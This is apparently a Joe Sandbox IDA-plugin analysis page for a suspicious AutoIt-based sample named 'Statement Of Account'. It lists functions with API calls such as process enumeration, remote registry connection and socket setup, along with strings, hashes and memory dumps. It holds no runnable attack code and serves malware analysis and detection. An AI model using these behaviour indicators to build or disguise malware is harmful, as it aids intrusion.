Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
String ID: \
API String ID: 321622961-2967466578
Opcode ID: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
Opcode Fuzzy Hash: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE

Function 0044C80C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0044C81E
__wcsnicmp.LIBCMT ref: 0044C8D8

Strings

#requireadmin, xrefs: 0044C8D2
#notrayicon, xrefs: 0044C818
#OnAutoItStartRegister, xrefs: 0044C83D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
Opcode Fuzzy Hash: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA

Function 00448DAF Relevance: 12.2, APIs: 8, Instructions: 173windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53

SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E

Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$BrushCreateDeleteObjectSolid
String ID:
API String ID: 3771399671-0
Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769

Function 00455EF5 Relevance: 12.1, APIs: 8, Instructions: 126windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00455F12
SendMessageW.USER32 ref: 00455F43
SendMessageW.USER32(?,0000104B,00000000,?), ref: 00455F82
SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00455FF5
_wcslen.LIBCMT ref: 00455FFC
_wcslen.LIBCMT ref: 00456018
CharNextW.USER32(00000000,?,?,?), ref: 00456034
SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00456060

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$_wcslen$CharNext_memset
String ID:
API String ID: 3841856926-0
Opcode ID: 1e0cf8b8d25046b6848c8f46273bd4d506c8fc7d824d1fae03d8575ab44ef5d5
Instruction ID: 728fd5b54b682decfcd50b06f9b7fb359c8698431e162ed45c662fcf507213b6
Opcode Fuzzy Hash: 1e0cf8b8d25046b6848c8f46273bd4d506c8fc7d824d1fae03d8575ab44ef5d5
Instruction Fuzzy Hash: 5D41D172204241ABE3108F68DC45BABB7E4FB84321F004A2EF954D72D1E7B9904A8B66

Function 00436EC8 Relevance: 12.1, APIs: 8, Instructions: 103COMMON

Download Yara Rule

APIs

EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
__wsplitpath.LIBCMT ref: 00436FA0
_wcscat.LIBCMT ref: 00436FB2
__wcsicoll.LIBCMT ref: 00436FC4
CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
String ID:
API String ID: 2903788889-0
Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766

Function 004140DB Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 004140E1

Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE

___fls_getvalue@4.LIBCMT ref: 004140EC

Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72

___fls_setvalue@8.LIBCMT ref: 004140FF

Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9

GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
RtlExitUserThread.NTDLL(00000000), ref: 0041410F
GetCurrentThreadId.KERNEL32 ref: 00414115
__freefls@4.LIBCMT ref: 00414135
__IsNonwritableInCurrentImage.LIBCMT ref: 00414148

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritableUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 2030478265-0
Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C

Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(00000038), ref: 004357C3
VariantClear.OLEAUT32(00000058), ref: 004357C9
VariantClear.OLEAUT32(00000068), ref: 004357CF
VariantClear.OLEAUT32(00000078), ref: 004357D5
VariantClear.OLEAUT32(00000088), ref: 004357DE
VariantClear.OLEAUT32(00000048), ref: 004357E4
VariantClear.OLEAUT32(00000098), ref: 004357ED
VariantClear.OLEAUT32(000000A8), ref: 004357F6

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64

Function 00464A0E Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 00464ADE

Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003

inet_addr.WS2_32(?), ref: 00464B1F
gethostbyname.WS2_32(?), ref: 00464B29
_memset.LIBCMT ref: 00464B92
GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
GlobalFree.KERNEL32(00000000), ref: 00464CDE
WSACleanup.WS2_32 ref: 00464CE4

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
String ID:
API String ID: 3424476444-0
Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A

Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ConnectRegistry_wcslen
String ID:
API String ID: 535477410-0
Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B

Function 0045377F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

_memset.LIBCMT ref: 004538C4
GetMenuItemInfoW.USER32(?,?), ref: 004538EF
_wcslen.LIBCMT ref: 00453960
SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0

Strings

0, xrefs: 004538BC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
String ID: 0
API String ID: 3530711334-4108050209
Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA

Function 00401D10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
UnregisterHotKey.USER32(?), ref: 0042A778
FreeLibrary.KERNEL32(?), ref: 0042A822
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854

Strings

close all, xrefs: 00401D55

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Free$LibrarySendStringUnregisterVirtual
String ID: close all
API String ID: 2389397985-3243417748
Opcode ID: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
Opcode Fuzzy Hash: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D

Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?), ref: 00473A00
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01

Strings

HH, xrefs: 00473999

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID: HH
API String ID: 3488606520-2761332787
Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96

Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON

Download Yara Rule

APIs

Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC

Ellipse.GDI32(?,?,?,00000000), ref: 00447463
MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
LineTo.GDI32(?,?), ref: 004474BF
CloseFigure.GDI32(?), ref: 004474C6
SetPixel.GDI32(?,?,?,?), ref: 004474D6
Rectangle.GDI32(?,?), ref: 004474F3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
String ID:
API String ID: 4082120231-0
Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA

Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC

Ellipse.GDI32(?,?,?,00000000), ref: 00447463
MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
LineTo.GDI32(?,?), ref: 004474BF
CloseFigure.GDI32(?), ref: 004474C6
SetPixel.GDI32(?,?,?,?), ref: 004474D6
Rectangle.GDI32(?,?), ref: 004474F3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
String ID:
API String ID: 4082120231-0
Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
